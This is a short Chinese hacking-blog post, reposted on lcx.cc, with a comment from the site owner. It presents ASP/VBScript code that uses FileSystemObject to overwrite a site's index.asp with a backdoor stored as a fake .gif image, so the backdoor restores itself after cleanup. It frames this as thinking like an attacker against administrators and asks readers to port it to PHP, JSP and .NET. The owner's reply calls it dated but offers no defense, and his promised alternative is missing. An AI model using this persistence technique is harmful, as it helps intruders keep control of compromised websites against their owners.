Php安全新闻早8点(2011-11-15 星期二)

  • A+
所属分类:lcx

    转载自:http://hi.baidu.com/micropoor

//2011-11-15 星期二
// 管理员的思维:
查找asp,php,jsp,.net脚本文件关键词
//我们的思维:
Set fso = CreateObject("Scripting.FileSystemObject")    
sFile = Server.Mappath("/index.asp")   
Set objFile = fso.GetFile(sFile)    
if  objFile.attributes 32 then:objFile.attributes = 32:end if   
fso.CopyFile Server.Mappath("/images/Micropoor.gif"),Server.Mappath("/index.asp")
%>
 
//一箭双雕:
那么我们可不可以把它作为index.php的还原精灵呢?它不仅仅是后门,更是我们的影子系统。
 
//课后题:
聪明的你,一定会把它演变成PHP,JSP,.NET等

    结论:站在“敌人”的角度考虑,往往你就是赢家。

站长评论:

这种没用的,早已经将 FSO 组件作为关键词了。

而且手法也相当古老了,只能蒙混小白。

并且很多机器 FSO 早卸载了,后门需要支持的东西越少越好。

还不如:

更爽一些。

文章来源于lcx.cc:Php安全新闻早8点(2011-11-15 星期二)

相关推荐: 【VB】SendKeys 语句详解

    SendKeys 语句 描述     将一个或多个按键消息发送到活动窗口,就如同用键盘进行输入一样。 语法     SendKeys string[, wait]     参数意义:     string部分必需的,字符串表达式,指定要发送的按键消息。…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: